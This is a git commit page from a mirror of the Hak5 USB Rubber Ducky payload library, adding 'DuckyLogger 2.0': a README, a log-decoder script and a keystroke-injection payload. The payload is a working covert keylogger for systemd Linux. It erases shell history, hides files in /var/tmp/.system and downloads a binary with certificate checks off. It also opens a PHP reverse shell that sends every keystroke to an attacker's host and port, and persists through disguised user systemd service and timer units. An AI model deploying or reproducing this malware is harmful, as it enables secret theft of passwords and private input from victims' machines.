hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/392/head
0iphor13 2024-01-01 17:40:58 +01:00 committed by GitHub
parent c5ecfcdc5b f2f850b555
commit 3a216241d8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 180 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

56
payloads/library/credentials/DuckyLogger2/README.md Normal file
View File

@ -0,0 +1,56 @@
## About:
* Title: DuckyLogger 2.0
* Description: Keylogger, which sends each and every keystroke of the target remotely/locally.
* AUTHOR: drapl0n
* Version: 2.0
* Category: Credentials.
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## DuckyLogger 2.0 is the most efficient version of the original DuckyLogger, which captures every keystroke of the traget and sends it back to the attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent.
* Autostart payload on boot.
### What's new ?
* No trigger from the target's end is required.
* Completely autostarts the payload on boot.
* Removed unnecessary script blocks.
* No need to run two different services.
### Workflow:
* Encoding payload and injecting it into the target's system.
* Checks whether the internet is connected to the target system.
* If the internet is connected, then it sends raw keystrokes to the attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload:
* Replace ip (0.0.0.0) and port number (4444) with your server's ip address and port number on line no. `43`.
* Increase/Decrease time interval to restart service periodically (default is 5 minutes), on line no. `59`.
### Usage:
1. Encode payload.txt and inject it into the target's system.
2. Start Netcat listner on the attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new a logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to an existing log file.
3. Process raw keystrokes using the DuckyLoggerDecoder utility:
```
./duckyLoggerDecoder
DuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.
Usage:
Decode captured log: [./duckyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify the log file.
-m Select Mode(normal|informative)
-o Specify an output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/DuckyLogger2/duckyLoggerDecoder Normal file
View File

@ -0,0 +1,50 @@
usage () {
echo -e "\nDuckyLoggerDecoder is used to decode raw key strokes acquired by DuckyLogger.\n"
echo -e "Usage: \nDecode captured logs:\t[./duckyLoggerDecoder -f <log file> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify the log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify an output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "DuckyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "DuckyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "DuckyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

74
payloads/library/credentials/DuckyLogger2/payload.txt Normal file
View File

@ -0,0 +1,74 @@
REM Title: DuckyLogger 2.0
REM Description: Keylogger which sends each and every keystroke of the target remotely/locally.
REM AUTHOR: drapl0n
REM Version: 2.0
REM Category: Credentials
REM Target: Unix-like operating systems with systemd.
REM Attackmodes: HID
REM [Note]
REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.
REM [keeping tracks clear]
DELAY 500
CTRL-ALT t
DELAY 400
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 100
REM [creating key logging mechanism]
STRING mkdir /var/tmp/.system
ENTER
DELAY 100
STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/sys
ENTER
DELAY 100
REM [importing xinput]
STRING cd /var/tmp/.system/
ENTER
DELAY 100
STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
ENTER
DELAY 2500
STRING chmod +x xinput
ENTER
DELAY 100
REM [creating reverse shell]
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
ENTER
DELAY 100
STRING chmod +x /var/tmp/.system/systemBus
ENTER
DELAY 100
REM [creating systemd service to execute payload on boot]
STRING mkdir -p ~/.config/systemd/user
ENTER
DELAY 200
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
ENTER
DELAY 100
REM [creating systemd timer unit]
STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
ENTER
DELAY 100
REM [enabling service]
STRING systemctl --user daemon-reload
ENTER
DELAY 300
STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
ENTER
DELAY 150
STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
ENTER
DELAY 150
STRING exit
ENTER